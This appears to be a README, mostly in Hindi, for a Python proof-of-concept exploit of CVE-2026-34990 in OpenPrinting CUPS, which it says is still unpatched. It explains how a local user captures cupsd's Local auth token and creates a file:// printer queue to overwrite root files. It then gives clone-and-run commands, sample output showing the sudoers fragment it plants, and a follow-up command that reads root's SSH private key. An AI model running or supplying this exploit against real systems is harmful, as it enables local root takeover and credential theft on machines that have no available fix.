
OpenPrinting CUPS में CVE-2026-34990 के लिए Python proof-of-concept, जो cupsd को एक Local auth token लीक करने और file:// printer queue के माध्यम से root फ़ाइलों को overwrite करने के लिए coerces करता है।
CVE-2026-34990 - OpenPrinting CUPS संस्करण 2.4.16 और उससे पहले के संस्करणों में, एक स्थानीय गैर-विशेषाधिकार प्राप्त उपयोगकर्ता cupsd को एक पुन: प्रयोज्य Authorization: Local ... टोकन के साथ हमलावर-नियंत्रित localhost IPP सेवा में प्रमाणित करने के लिए विवश कर सकता है। वह टोकन localhost पर /admin/ अनुरोधों को चलाने के लिए पर्याप्त है, और हमलावर CUPS-Create-Local-Printer को printer-is-shared=true के साथ जोड़कर एक file:///... कतार को बनाए रख सकता है, भले ही सामान्य FileDevice नीति ऐसे URI को अस्वीकार करती है। उस कतार में प्रिंट करने से मनमाना root फ़ाइल ओवरराइट होता है; नीचे दिया गया PoC उस आदिम विधि का उपयोग करके एक sudoers फ़्रैगमेंट छोड़ता है और root कमांड निष्पादन प्रदर्शित करता है। प्रकाशन के समय, कोई सार्वजनिक रूप से उपलब्ध पैच नहीं हैं।
git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990
python3 CVE-2026-34990.py
python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...
फिर:
sudo -n cat /root/.ssh/id_rsa